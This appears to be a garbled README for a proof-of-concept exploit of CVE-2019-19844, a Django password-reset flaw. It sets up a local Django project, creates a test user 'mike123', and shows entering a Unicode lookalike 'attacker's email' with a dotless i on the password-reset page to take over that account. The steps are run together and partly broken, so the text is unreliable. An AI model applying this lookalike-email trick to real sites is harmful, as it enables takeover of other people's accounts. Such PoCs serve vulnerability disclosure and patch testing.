
PoC for CVE-2019-19844 ( https://www.djangoproject.com/weblog/2019/dec/18/security-releases/ )
PoC for CVE-2019-19844
django_cve_2019_19844_poc)DJANGO_DATABASE_NAME(e.g. export DJANGO_DATABASE_NAME=django_cve_2019_19844_poc)pip install -r requirements.txt && ./manage.py migrate --noinputshell command:>>> from django.contrib.auth import get_user_model
>>> User = get_user_model()
>>> User.objects.create_user('mike123', '[email protected]', 'test123')
./manage.py runserverhttp://127.0.0.1:8000/accounts/password-reset/mı[email protected] (Attacker's email), and click send buttonmike123 user